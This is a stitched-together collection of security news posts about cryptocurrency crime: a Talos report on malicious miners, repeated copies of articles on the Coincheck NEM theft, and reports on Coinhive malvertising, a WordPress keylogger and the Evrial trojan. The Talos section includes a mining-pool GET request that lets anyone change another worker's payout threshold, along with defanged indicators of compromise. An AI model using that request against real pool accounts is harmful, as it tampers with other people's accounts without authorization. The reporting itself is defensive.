In addition to threats targeting users, Talos has also observed coin miners being delivered via active exploitation in our honeypot infrastructure. This includes leveraging multiple different exploits to deliver these types of payloads. There have been widespread reports of EternalBlue being used to install miners, as well as various Apache Struts2 exploits, and most recently a Oracle WebLogic exploit. This type of payload is perfect for active exploitation since it doesn't require persistent access to the end system, it is largely transparent to the end user, and finally can result in significant financial gain.

When you take threats being delivered to users via email and web as well as internet connected systems being compromised to deliver a miner payload, it's obvious that miners are being pushed by adversaries today much like ransomware was being pushed to systems a year ago. Based on this evidence, we began digging a little bit deeper on the actual mining activity and the systems that have already been mining.

Deeper Dive on Mining and Workers


Over the course of several months, we began looking for crypto miner activity on systems and uncovered prevalent threats associated with multiple different groups relying on familiar tricks to run on systems. Additionally, we found a large number of enterprise users running or attempting to run miners on their systems for potential personal gain.

One thing that has been common with most of the malicious miners we found were the filename choices. Threat actors have chosen filenames that look harmless, such as "Windows 7.exe" and "Windows 10.exe". Additionally, Talos commonly saw "taskmgrss.exe", "AdobeUpdater64.exe", and "svchost.exe". Talos also found examples of miners being pulled dynamically and run via the command line, an example of which is shown below.
Command Line Syntax

Interestingly, we also found miners purporting to be anti-virus software, including our own free anti-virus product Immunet.

Mining as a Payload for the Future


Cryptocurrency miner payloads could be among some of the easiest money makers available for attackers. This is not to try and encourage the attackers, of course, but the reality is that this approach is very effective at generating long-term passive revenue for attackers. Attackers simply have to infect as many systems as possible, execute the mining software in a manner that makes it difficult to detect, and they can immediately begin generating revenue. Attackers will be likely be just as happy computing 10KH/s as 500KH/s. If they have a specific hashrate goal, they can simply continue distributing miners to victims until they reach that goal.

The sheer volume of infected machines is how attackers can measure success with these campaigns. Since financial gain via mining is the mission objective there is no need to attempt to compromise hosts to steal documents, passwords, wallets, private keys, as we've grown accustomed to seeing from financially motivated attackers. We have commonly seen ransomware delivered with additional payloads. These can either provide secondary financial benefit or, in some cases, deliver the real malicious payload. In the later case ransomware can be used a smoke screen designed to distract. While we have seen active vulnerability exploitation used as the initial vector for infecting systems with cryptocurrency mining software, that is the extent of the overtly malicious activity. Once a system has become infected in this scenario, attackers are typically focused on maximizing their hash rates and nothing more.

Simply leveraging the resources of a single infected system is likely not profitable enough for most attackers. However consider 100,000 systems and the profitability of this approach skyrockets. In most cases attackers attempt to generate as much revenue as easily and cheaply as possible. With mining software they already have their method of gains in the form of the control of system resources and the volume of hashes that can be generated by it.

Recurring revenue is not just something a legitimate business strives for. Malicious adversaries do as well. Complex malware is expensive to design, create, test, and then deliver to victims. Complex malware is often reserved for very complex attacks and rarely is this type of malware used to attack 100,000s of users. As such a recurring revenue model isn't really applicable to these complex malware attacks, generally speaking. With cryptominers attackers have created an entire solution specifically designed to do one thing: generate recurring revenue.

Continuing use of cryptominers as a payload and ensuring the system is running at full capacity will continue to evolve. Talos has observed attacks where the attacker has cleaned up the machine by removing other miners before then infecting the user and installing their own mining software. Attackers are already fighting for these resources as the potential monetary value and ongoing revenue stream is massive.

Are Miners Malware?


Mining client software itself should not be considered malware or a Potentially Unwanted Application/Potentially Unwanted Program (PUA/PUP). The legitimate mining client software is simply being leveraged in a malicious way by actors to ensure that they are able to generate revenue by mining on infected machines. Mining software is written specifically to ensure that the cryptocurrencies being used are available to people, to ensure consensus on the network, perform and validate transactions and reward miners performing the complex mathematical calculations to ensure the integrity and security of the cryptocurrency ecosystem & network.

If a legitimate user runs the mining software locally they can run their own mining platform; likewise a legitimate user can become part of a pool to try and maximize their chances of receiving a payout. The difference between the legitimate user and a threat actor is that they are performing this task intentionally. The malicious actor is performing this task, in the exact same manner as the legitimate user, but without the user's knowledge or consent. The difference is the deception that occurs for the end user and the intent behind mining the cryptocurrencies. The software itself is unfortunately part of the malicious arsenal the attacker chooses to use, but, much like when Powershell or PSExec is used in malicious attacks, the software itself is not malicious by design. It is the intent with which it is used that is important. When these miners are leveraged by attackers, victims are unwittingly forced to pay for the electricity used during the mining process and are having their computational resources abused to generate revenue for the actors.

Enterprise Impacts


Regardless of whether the miner was deployed using malicious methods or simply by an enterprise user trying to generate some coin from their work computer, enterprises have to decide if miners are malware within their environments.

This is an interesting challenge because generally the only thing miners do is utilize CPU/GPU cycles to complete complex math problems. However, it is wasted or stolen resources for an organization and depending on the configuration of these systems, it could have larger impacts. Obviously if a miner is placed onto a system via one of the methods discussed above it is a malicious payload. However, Talos found large numbers of users that appeared to willingly run these miners on enterprise systems to generate coin.

Due to the large amount of willing users, it might warrant an organization crafting a policy or adding a section to existing policy regarding the use of miners on enterprise systems and how it will be handled. Additionally, it is up to each organization to decide whether or not these file should be treated as malware, and removed/quarantined as such.

Fails we Found


While investigating malware campaigns that were distributing Monero mining software we observed an interesting case where the attacker used an open-source mining client called 'NiceHash Miner' and began distributing it. In this particular case, the command line syntax used to execute the miner on infected systems is below:
Command Line Syntax

Interestingly, the userpass parameter that is used to register the mining client to the specific Worker ID being used is '3DJhaQaKA6oyRaGyDZYdkZcise4b9DrCi2.Nsikak01'. When analyzing this particular campaign, we identified that this userpass is actually the default userpass specified in the mining software source code as released on GitHub. The attacker didn't bother to change it, resulting in all of the machines infected mining Monero which was being sent to the mining application's author - not the attacker themselves.
Source Code Default Values

In several other cases we observed attackers utilizing default values within the command line syntax being used to execute their miners. A few examples are below:
Mining Fail Example #1
Mining Fail Example #2
Mining Fail Example #3
Mining Fail Example #4

This clearly indicates that many of the attackers leveraging cryptocurrency miners are extensively using code and command line syntax they find online, and in some cases may not actually understand the code they are working with or how cryptocurrency mining even works. As a result, default values and placeholders are not always being updated to enable them to monetize or generate revenue from these sorts of attacks.

Additionally, while performing our research we found an interesting way that could, in theory, allow one to manipulate the payouts received by the attackers. Currently, within the web interface used by many of the mining pools (and exposed via an API), there is a "Personal Threshold" value that is publicly editable. This setting determines how much coin must be mined before the payout will be sent to the attacker's wallet. By setting this value to a large amount (e.g. 50 XMR) the attacker would have to wait an extended period before receiving their next payout. While the attacker could just change this value back, it could be changed right back to 50 XMR using a GET request as long as the request is made to the mining pool's URL using the following structure:

"https://p5[.]minexmr[.]com/set_info?address=$WORKER&type=thold&amount=50000000000000"

Where $WORKER is the 'Worker ID' that is being modified. This same parameter is available on many of the major mining pool websites that we analyzed. Note that the syntax could be different depending on the pool that is being used by the adversary.

Conclusion


The number of ways adversaries are delivering miners to end users is staggering. It is reminiscent of the explosion of ransomware we saw several years ago. This is indicative of a major shift in the types of payloads adversaries are trying to deliver. It helps show that the effectiveness of ransomware as a payload is limited. It will always be effective to ransom specific organizations or to use in targeted attacks, but as a payload to compromise random victims its reach definitely has limits. At some point the pool of potential victims becomes too small to generate the revenue expected.

Crypto miners may well be the new payload of choice for adversaries. It has been and will always be about money and crypto mining is an effective way to generate revenue. It's not going to generate large sums of money for each individual system, but when you group together hundreds or thousands of systems it can be extremely profitable. It's also a more covert threat than ransomware. A user is far less likely to know a malicious miner is installed on the system other than some occasional slow down. This increases the time a system is infected and generating revenue. In many ways its the exact opposite of ransomware. Ransomware is designed to generate revenue in a couple of days from a victim and the payoff is immediate. Malicious miners are designed to exist on a system for weeks, months, or ideally years.

It also introduces a new challenge to enterprises. A decision needs to be made on how to treat things like miners and whether they should be judged exclusively as malware. Each enterprise needs to decide how to handle these threats. The first step is determining how prevalent they are in your environment and then deciding how to handle it going forward.

Coverage


There are different ways to address miners and there is detection built in to Cisco security products to detect this activity. There is a specific detection name in AMP for coin miners, W32.BitCoinMiner. However, as these miners can be added as modules to various other threats, the detection names may vary. Additionally there are a couple NGIPS signatures designed to detect mining activity as well. However, these rules may not be enabled by default in your environment depending on the importance of potentially unwanted applications (PUA) in your network. The signatures that detect this type of activity includes, but isn't limited to: 40841-40842, 45417, and 45548-45550.

Also, technologies like Threat Grid have created indicators to clearly identify when mining activity is present when a sample is submitted.

IOC Section


IP Addresses:


89.248.169[.]136
128.199.86[.]57

Domains:


qyvtls749tio[.]com
youronionlink[.]onion

File Hashes


Coincheck hackers are reportedly trying to unload stolen cryptocurrency

Last week, hackers stole around $534 million worth of cryptocurrency XEM from Tokyo-based exchange Coincheck, and now, Reuters reports, the hackers behind the heist are trying to sell the stolen cryptocurrency. Jeff McDonald, vice president of the NEM Foundation, the company behind XEM, told Reuters that he had tracked down an account holding the coins and those in possession of the stolen XEM were trying to sell them on six different cryptocurrency exchanges. "He is trying to spend them on multiple exchanges. We are contacting those exchanges," said McDonald. He also told Reuters that he couldn't yet determine how much of the stolen coins had already been spent.

Via: Reuters

Coincheck Hack Ghosts $534 Million Worth of Cryptocurrency

Following the recent hack of Japanese exchange service Coincheck, $534 million worth of cryptocurrency was stolen from the company’s “hot wallet”. With the investigation revealing that hackers remained undetected for an estimated eight hours on Jan. 25, the Japanese Financial Services Agency (FSA) warned the exchange service to set up improvements that prevent or limit such incidents.

Although Japan has asked all cryptocurrency operators to register with the government in an attempt to regulate the cryptocurrency industry, Coincheck was allowed to continue operations. Because it had applied for license as an exchange, though, Coincheck does fall under the supervision of the FSA.

The company said it’s currently tracking the missing funds and may be able to recover them. However, there is no guarantee that the process will be successful.

“We know where the funds were sent,” said Co-founder Yusuke Otsuka in a press conference. “We are tracing them and if we’re able to continue tracking, it may be possible to recover them. But it is something we are investigating at the moment.”

While the equivalent of 58 billion yen of NEM tokens were stolen, Coincheck did say they will cover 90 percent of losses using internal funds.

“What’s the lasting impact? It’s hard to tell,” said Marc Ostwald, global strategist at ADM Investor Services International in London. “Japan is one of the most pro-crypto trading countries, among the G-20. In Japan they don’t really want a wholesale clampdown. So it will be interesting how Japanese regulators respond to this, if they indeed do.”

Coincheck is not the first cryptocurrency exchange to fall victim to a cryptocurrency heist; in 2014 Mt. Gox lost between $400 and $480 million. Japanese regulators have since started to try to regulate cryptocurrency exchanges to prevent similar losses.

Cybersecurity week Round-Up (2018, Week 4)

Cybersecurity week Round-Up (2018, Week 4) -Let’s try to summarize the most important event occurred last week in 3 minutes.

The threats that most of all characterized this week are IoT botnets and malvertising.

Security experts at NewSky’s believe the operators of the recently discovered Satori botnet are launching a new massive hacking campaign against routers to infect and recruit them in the botnet dubbed Masuta. The Masuta botnet targets routers using default credentials, one of the versions analyzed dubbed “PureMasuta” relies on the old network administration EDB 38722 D-Link exploit.

A new botnet called Hide ‘N Seek (HNS botnet) appeared in the threat landscape, the malware is rapidly spreading infecting unsecured IoT devices, mainly IP cameras. The number of infected systems grew up from 12 at the time of the discovery up to over 20,000 bots.

Malware experts at CSE Cybsec uncovered a massive malvertising campaign dubbed EvilTraffic leveraging tens of thousands compromised websites. Crooks exploited some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenues via advertising.

The problems with Meltdown and Spectre security patches continue, Intel recommended to stop deploying the current versions of Spectre/Meltdown patches, while the Linux father Linus Torvalds defined the Spectre updates “utter garbage.”

Bell Canada suffers a data breach for the second time in less than a year.

Crooks continue to focus their interest on cryptocurrencies, researchers at PaloAlto Networks uncovered Monero Crypto-Currency Mining Operation impacted 30 Million users worldwide.

Maersk chair revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya Attack.

The week ended with a clamorous incident, the Japan-based digital exchange Coincheck was hacked, hackers stole worth half a billion US dollars of NEM currency. The incident had a significant effect on the value of the most popular crypto currencies.

Pierluigi Paganini

(Security Affairs – cybersecurity, cyberweek)

The post Cybersecurity week Round-Up (2018, Week 4) appeared first on Security Affairs.

Japan cryptocurrency exchange to refund stolen assets worth $400m

Coincheck, one of Japan’s major cryptocurrency exchange, has promised to refund to its customers about $423m (£282m) stolen by hackers two days ago in one of the biggest thefts of digital funds.

The hack occurred on Friday, when the company detected an “unauthorised access” of the exchange and suspended trading for all cryptocurrencies apart from bitcoin.

The attackers were able to access the company’s NEM coins, which are a lesser known but still the world’s 10th biggest cryptocurrency by market capitalisation. The losses went up to about $534m (£380m).

The company has stated that it will reimburse the affected customers to nearly 90% of their loss using cash.

Over 260,000 are reported to have been affected by the hack.

According to Coincheck, the hackers were able to steal the NEM coins because they were kept in online “hot wallets” instead of the more secure and offline “cold wallets.”

The company claims that it is aware of the digital address where the coins have been transferred and believes the assets are recoverable.

E Hacking News – Latest Hacker News and IT Security News: Japan cryptocurrency exchange to refund stolen assets worth $400m

Coincheck, one of Japan’s major cryptocurrency exchange, has promised to refund to its customers about $423m (£282m) stolen by hackers two days ago in one of the biggest thefts of digital funds.

The hack occurred on Friday, when the company detected an “unauthorised access” of the exchange and suspended trading for all cryptocurrencies apart from bitcoin.

The attackers were able to access the company’s NEM coins, which are a lesser known but still the world’s 10th biggest cryptocurrency by market capitalisation. The losses went up to about $534m (£380m).

The company has stated that it will reimburse the affected customers to nearly 90% of their loss using cash.

Over 260,000 are reported to have been affected by the hack.

According to Coincheck, the hackers were able to steal the NEM coins because they were kept in online “hot wallets” instead of the more secure and offline “cold wallets.”

The company claims that it is aware of the digital address where the coins have been transferred and believes the assets are recoverable.


E Hacking News - Latest Hacker News and IT Security News

Japan-based digital exchange Coincheck to refund to customers after cyberheist

Coincheck announced it will refund about $400 million to 260,000 customers after the hack, the company will use its own funds.

On Friday the news of the hack of the Japan-based digital exchange Coincheck caused the drop in the value of the major cryptocurrencies, the incident had a significant impact on the NEM value that dropped more than 16 percent in 24 hours.

The company suspended the operations of deposits and withdrawals for all the virtual currencies except Bitcoin, the exchange announced it was investigating an “unauthorised access” to the exchange.

According to the company, the hackers stole worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalization.

The hackers stole 58 billion yen ($530 million), an amount of money that is greater than the value of bitcoins which disappeared from MtGox in 2014.

Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia.

The company announced it will refund about $400 million to customers after the hack. 

Coincheck will use its own funds to reimburse about 46.3 billion yen to its 260,000 customers who were impacted by the cyberheist.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected,”

Experts believe that the Financial Services Agency will to take disciplinary measures against Coincheck.

It has been estimated that as many as 10,000 businesses in Japan accept bitcoin and bitFlyer, nearly one-third of global Bitcoin transactions in December were denominated in yen.The Cryptocurrencies, and in particular Bitcoin, are very popular in Japan, in April, the Bitcoin was proclaimed by the local authorities as legal tender.

According to Japanese bitcoin monitoring site Jpbitcoin.com, in November, yen-denominated bitcoin trades reached a record 4.51 million bitcoins, or nearly half of the world’s major exchanges of 9.29 million bitcoin.

Japanese media criticized the company blaming the management to have underestimated the importance of security of its investor,  they said Coincheck “expanded business by putting safety second”.

Politicians and experts that participated in the World Economic Forum in Davos issued warnings about the dangers of cryptocurrencies, it is expected that government will adopt further measures to avoid abuse and illegal uses of cryptocrurrencies.

 

Pierluigi Paganini

(Security Affairs – Coincheck, Security Breach)

The post Japan-based digital exchange Coincheck to refund to customers after cyberheist appeared first on Security Affairs.

Security Affairs: Japan-based digital exchange Coincheck to refund to customers after cyberheist

Coincheck announced it will refund about $400 million to 260,000 customers after the hack, the company will use its own funds.

On Friday the news of the hack of the Japan-based digital exchange Coincheck caused the drop in the value of the major cryptocurrencies, the incident had a significant impact on the NEM value that dropped more than 16 percent in 24 hours.

The company suspended the operations of deposits and withdrawals for all the virtual currencies except Bitcoin, the exchange announced it was investigating an “unauthorised access” to the exchange.

According to the company, the hackers stole worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalization.

The hackers stole 58 billion yen ($530 million), an amount of money that is greater than the value of bitcoins which disappeared from MtGox in 2014.

Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia.

The company announced it will refund about $400 million to customers after the hack. 

Coincheck will use its own funds to reimburse about 46.3 billion yen to its 260,000 customers who were impacted by the cyberheist.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected,”

Experts believe that the Financial Services Agency will to take disciplinary measures against Coincheck.

It has been estimated that as many as 10,000 businesses in Japan accept bitcoin and bitFlyer, nearly one-third of global Bitcoin transactions in December were denominated in yen.The Cryptocurrencies, and in particular Bitcoin, are very popular in Japan, in April, the Bitcoin was proclaimed by the local authorities as legal tender.

According to Japanese bitcoin monitoring site Jpbitcoin.com, in November, yen-denominated bitcoin trades reached a record 4.51 million bitcoins, or nearly half of the world’s major exchanges of 9.29 million bitcoin.

Japanese media criticized the company blaming the management to have underestimated the importance of security of its investor,  they said Coincheck “expanded business by putting safety second”.

Politicians and experts that participated in the World Economic Forum in Davos issued warnings about the dangers of cryptocurrencies, it is expected that government will adopt further measures to avoid abuse and illegal uses of cryptocrurrencies.

 

Pierluigi Paganini

(Security Affairs – Coincheck, Security Breach)

The post Japan-based digital exchange Coincheck to refund to customers after cyberheist appeared first on Security Affairs.



Security Affairs

Coincheck loses $400 million in massive cryptocurrency heist

Tokyo-based cryptocurrency exchange Coincheck just made history, and not in a good way. It has lost around $534 million worth of NEM tokens, one of the lesser-known cryptocurrencies, after its network was hacked on January 25th, 12:57pm EST. The attackers remained undetected for eight hours, giving them enough time to steal 523 million tokens kept in a "hot wallet," a type of storage that's connected to the internet for easy spending. While the exact value of the stolen coins are unclear due to the ever-changing nature of cryptocurrency -- it's $400 million at the very least -- Coincheck might have already lost more than what Mt. Gox did a few years ago.

Source: CoinDesk, BBC, Bloomberg

Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner

Trend Micro uncovered a spike in the number of Coinhie miners over the past few days, including Coinhive, apparently linked to Google’s DoubleClick ads that are proposed on YouTube and other sites.

The number of cyber-attacks against cryptocurrencies is increased due to a rapid increase in the value of currencies such as Bitcoin and Ethereum.

Hackers targeted almost any actor involved in the business of cryptocurrencies, single users, miners and of course exchanges.

Security firms have detected several malware applications specifically designed to steal cryptocurrencies, and many websites were compromised to install script used to mine virtual coins abusing computational resources of unaware visitors.

Researchers at Trend Micro uncovered a spike in the number of Coinhie miners over the past few days apparently linked to Google’s DoubleClick ads that are proposed on YouTube and other sites.

“On January 24, 2018, we observed that the number of Coinhive web miner detections tripled due to a malvertising campaign. We discovered that advertisements found on high-traffic sites not only used Coinhive (detected by Trend Micro as JS_COINHIVE.GN), but also a separate web miner that connects to a private pool.”  states the analysis published by Trend Micro.

“We detected an almost 285% increase in the number of Coinhive miners on January 24. We started seeing an increase in traffic to five malicious domains on January 18. After closely examining the network traffic, we discovered that the traffic came from DoubleClick advertisements.

Coinhive

The researchers observed two separate web cryptocurrency miner scripts, both hosted on AWS, that were called from a web page that presents the DoubleClick ad.

The advertisement uses a JavaScript code that generates a random number between 1 and 101. If the number generated is greater than 10, the advertisement will call the coinhive.min.js script to mine 80% of the CPU power. For the remaining 10%, the advertisement launch a private web miner, the mqoj_1.js script.

“The two web miners were configured with throttle 0.2, which means the miners will use 80% of the CPU’s resources for mining.” continues the analysis.

Coinhive

Google promptly took action against the ads that abuse users’ resources violating its policies.

Blocking JavaScript-based applications from running on browsers can prevent the execution of Coinhive miners, the experts suggest to regularly patch and update web browsers to reduce the risks.

Pierluigi Paganini

(Security Affairs – cryptocurrency, Coinhive)

The post Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner appeared first on Security Affairs.

Security Affairs: Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner

Trend Micro uncovered a spike in the number of Coinhie miners over the past few days, including Coinhive, apparently linked to Google’s DoubleClick ads that are proposed on YouTube and other sites.

The number of cyber-attacks against cryptocurrencies is increased due to a rapid increase in the value of currencies such as Bitcoin and Ethereum.

Hackers targeted almost any actor involved in the business of cryptocurrencies, single users, miners and of course exchanges.

Security firms have detected several malware applications specifically designed to steal cryptocurrencies, and many websites were compromised to install script used to mine virtual coins abusing computational resources of unaware visitors.

Researchers at Trend Micro uncovered a spike in the number of Coinhie miners over the past few days apparently linked to Google’s DoubleClick ads that are proposed on YouTube and other sites.

“On January 24, 2018, we observed that the number of Coinhive web miner detections tripled due to a malvertising campaign. We discovered that advertisements found on high-traffic sites not only used Coinhive (detected by Trend Micro as JS_COINHIVE.GN), but also a separate web miner that connects to a private pool.”  states the analysis published by Trend Micro.

“We detected an almost 285% increase in the number of Coinhive miners on January 24. We started seeing an increase in traffic to five malicious domains on January 18. After closely examining the network traffic, we discovered that the traffic came from DoubleClick advertisements.

Coinhive

The researchers observed two separate web cryptocurrency miner scripts, both hosted on AWS, that were called from a web page that presents the DoubleClick ad.

The advertisement uses a JavaScript code that generates a random number between 1 and 101. If the number generated is greater than 10, the advertisement will call the coinhive.min.js script to mine 80% of the CPU power. For the remaining 10%, the advertisement launch a private web miner, the mqoj_1.js script.

“The two web miners were configured with throttle 0.2, which means the miners will use 80% of the CPU’s resources for mining.” continues the analysis.

Coinhive

Google promptly took action against the ads that abuse users’ resources violating its policies.

Blocking JavaScript-based applications from running on browsers can prevent the execution of Coinhive miners, the experts suggest to regularly patch and update web browsers to reduce the risks.

Pierluigi Paganini

(Security Affairs – cryptocurrency, Coinhive)

The post Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner appeared first on Security Affairs.



Security Affairs

Security Affairs: Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked

It is a black Friday for cryptocurrencies, after the news of the hack of the Japan-based digital exchange Coincheck the value of major cryptocurrencies dropped.

It is a black Friday for cryptocurrencies, the news of the hack of the Japan-based digital exchange Coincheck had a significant impact on their value.

Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia.

The Coincheck suspended the operations of deposits and withdrawals for all the virtual currencies except bitcoin, the exchange announced it was investigating an “unauthorised access” to the exchange.

According to the company, the hackers stole worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalization.

The news of the incident has a significant impact on the NEM value that dropped more than 16 percent in 24 hours.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected,”

Coincheck hack NEM Value

NEM Charts – CoinMarketCap.com

The experts at the exchange are investigating the security breach to find out whether it was from Japan or another country.

Coincheck discovered the incident at 11.25 am and notified the suspension of trading for all cryptocurrencies apart from bitcoin via Twitter.

In February 2014, Mt. Gox suspended trading and filed for bankruptcy protection from creditors.

At the time, the company was handling over 70% of all bitcoin transactions worldwide, it announced that approximately 850,000 bitcoins ($450 million at the time) belonging to customers and the company were stolen.

Pierluigi Paganini

(Security Affairs – Coincheck, Security Breach)

 

 

The post Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked appeared first on Security Affairs.



Security Affairs

Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked

It is a black Friday for cryptocurrencies, after the news of the hack of the Japan-based digital exchange Coincheck the value of major cryptocurrencies dropped.

It is a black Friday for cryptocurrencies, the news of the hack of the Japan-based digital exchange Coincheck had a significant impact on their value.

Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia.

The Coincheck suspended the operations of deposits and withdrawals for all the virtual currencies except bitcoin, the exchange announced it was investigating an “unauthorised access” to the exchange.

According to the company, the hackers stole worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalization.

The news of the incident has a significant impact on the NEM value that dropped more than 16 percent in 24 hours.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected,”

Coincheck hack NEM Value

NEM Charts – CoinMarketCap.com

The experts at the exchange are investigating the security breach to find out whether it was from Japan or another country.

Coincheck discovered the incident at 11.25 am and notified the suspension of trading for all cryptocurrencies apart from bitcoin via Twitter.

In February 2014, Mt. Gox suspended trading and filed for bankruptcy protection from creditors.

At the time, the company was handling over 70% of all bitcoin transactions worldwide, it announced that approximately 850,000 bitcoins ($450 million at the time) belonging to customers and the company were stolen.

Pierluigi Paganini

(Security Affairs – Coincheck, Security Breach)

 

 

The post Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked appeared first on Security Affairs.

Someone Stole Almost Half a BILLION Dollars from Japanese Cryptocurrency Exchange

Coincheck, a Tokyo-based cryptocurrency exchange, has suffered what appears to be the biggest hack in the history of cryptocurrencies, losing $532 million in digital assets (nearly $420 million in NEM tokens and $112 in Ripples). In 2014, Mt Gox, one of the largest bitcoin exchange at that time, filed for bankruptcy after admitting it had lost $450 million worth of Bitcoins. Apparently, the

HOTforSecurity: Keylogger found on thousands of WordPress-based sites, stealing every keypress as you type

A new report from researchers at Sucuri reveals that websites are once again being found infected by cryptomining code – stealing the resources of visiting computers to mine for the Monero cryptocurrency.

Many web surfers almost certainly don’t realise that the reason that their laptop’s fan is running at full blast is because the website they are viewing is tied up with the complex number-crunching necessary to earn the digital currency.

But, in a twist, this particular attack isn’t just interested in mining Monero. While the website’s front-end is digging for cryptocurrencies, the back-end is secretly hosting a keylogger designed to steal unsuspecting users’ login credentials.

With the keylogger in place, any information entered on any of the affected websites’ web forms will be surreptitiously sent to the hackers.

And yes, that includes the site’s login form.

As if that wasn’t bad enough, what is typed in the forms is sent to the hackers even before the user has clicked on the “log in” button.

 

If a hacker manages to steal the credentials of the site’s administrator they won’t need to rely upon a vulnerability to break into the site in future, they can just login without a care in the world. (And yes, that’s another reason why WordPress accounts should be defended with two-factor authentication).

As Bleeping Computer reports, there are at least 2,000 WordPress sites infected with the keylogger. This is in addition to earlier related attacks which were affecting near 5,500 WordPress sites last month.

We’ve said it before, and we’ll no doubt say it again. And again.

If your website is powered by the self-hosted edition of WordPress, it’s essential that you keep both it, and any third-party plugins, updated.

Self-hosting your WordPress site is attractive in many ways, but you have to acknowledge that security is now your responsibility (or find yourself a managed wordpress host who is prepared to take it on for you). New vulnerabilities are found in the software and its many thousands of third-party plugins all the time.

In short, if you don’t know what you’re doing, there’s a chance that your WordPress-running website has security holes which a malicious hacker could exploit. Such security weaknesses could potentially damage your brand, scam your website visitors, and help online criminals to make their fortune.



HOTforSecurity

Exploring the Correlation Between Bitcoin’s Boom and Evrial’s Capabilities

Many of the stealthiest cyberthreats out there spawn on underground forums, as malware authors leverage the space to sell unique variants to fellow criminals. And now there’s a new addition to the underground scene. Meet Evrial: a powerful, information-stealing Trojan which is currently for sale for 1,500 Rubles or $27 USD. Its author previously created another variant named CryptoShuffler, which allows cybercriminals to replace the Windows clipboard and steal files from cold cryptocurrency wallets, as well as passwords from programs/browsers. Its successor, Evrial, can steal browser cookies, swoop stored credentials, and monitor the Windows clipboard too — only now it can potentially hijack active cryptocurrency payments and send stolen money directly to a cybercriminal’s address.

Specifically, the Trojan is capable of monitoring the Windows clipboard for certain types of text, and if it detects specific strings, it can modify or even replace them with ones sent by the attacker. This could mean replacing legitimate addresses and URLs with ones under the attacker’s control; a regular Bitcoin address could suddenly become one belonging to a cybercriminal. If the target pastes that address into their app, thinking it’s the legitimate one, and sends Bitcoin, the cyptocurrency will be soon be in the hands of the cybercriminal. Mind you, Evrial goes beyond Bitcoin, as it is also configured to detect strings that correspond to Litecoin, Monero, WebMoney, Qiwi addresses and Steam items trade URLs.

Evrial is just one of many Bitcoin-centric news stories lately, as cryptocurrency in general has been on practically everyone’s minds – which begs the question, is there a connection? Is the increased focus on digital currency inciting the creation of malware variants designed specifically to capitalize on Bitcoin’s boom?

In short – yes and no. Historically, cryptocurrencies have been a popular mechanism on underground markets for several years. Other digital currencies were used in the past but presented problems for bad actors due to their centralized nature. However, Blockchain technology, which powers cryptocurrencies like Bitcoin and is designed to be decentralized, allowed bad actors to protect their assets from law enforcement. Noticing this value, criminals on underground markets began to use this to their benefit well before the value of Bitcoin reached $1000+ a coin.

But soon enough Bitcoin value continued to grow and malware authors took notice, as they began to target Bitcoin wallets rather than simply trade in it. Ransomware exploded, holding victim’s files and machines hostage for almost exclusively Bitcoin payment. Malware that was traditionally sold as a scraper (to steal credit card information and passwords) was upgraded to include a cryptocurrency mining feature and was sold at a premium price.

Bad actor adoption of cryptocurrency has been both significant and quick, and notably much faster than the general population. Malware that uses, steals, and is sold with cryptocurrency is now the norm. And now as the general population’s interest in cryptocurrency has exploded, we’ve seen an increase in interest from malware authors as well. This interest has led to new malware behavior, such as Evrial’s ability to scan clipboards for cryptocurrency addresses. It’s had a major impact in how business is done in the underground.

However, it’s important to note that Bitcoin’s popularity presents its own problems. The volatile value has made the buying and selling of illicit goods problematic. Additionally, the pricing of a ransom is now askew. This has forced some markets to move to multi-coin platforms (namely incorporating Monero) as an alternative and some malware families to turn to other alt-coins to mine or steal.

All in all, cryptocurrency is no different than other motivators before it – when cybercriminals find the right opportunity to enhance their profitability, they capitalize on it. And when road blocks emerge, they find ways to maneuver around them. Now, the next step for cyber defenders is to keep their eyes peeled for what’s next, and eventually — outpace cybercriminals entirely.

To learn more about the fight against Evrial and other Trojans like it, be sure to follow us at @McAfee and @McAfee_Labs.

The post Exploring the Correlation Between Bitcoin’s Boom and Evrial’s Capabilities appeared first on McAfee Blogs.

McAfee Blogs: Exploring the Correlation Between Bitcoin’s Boom and Evrial’s Capabilities

Many of the stealthiest cyberthreats out there spawn on underground forums, as malware authors leverage the space to sell unique variants to fellow criminals. And now there’s a new addition to the underground scene. Meet Evrial: a powerful, information-stealing Trojan which is currently for sale for 1,500 Rubles or $27 USD. Its author previously created another variant named CryptoShuffler, which allows cybercriminals to replace the Windows clipboard and steal files from cold cryptocurrency wallets, as well as passwords from programs/browsers. Its successor, Evrial, can steal browser cookies, swoop stored credentials, and monitor the Windows clipboard too — only now it can potentially hijack active cryptocurrency payments and send stolen money directly to a cybercriminal’s address.

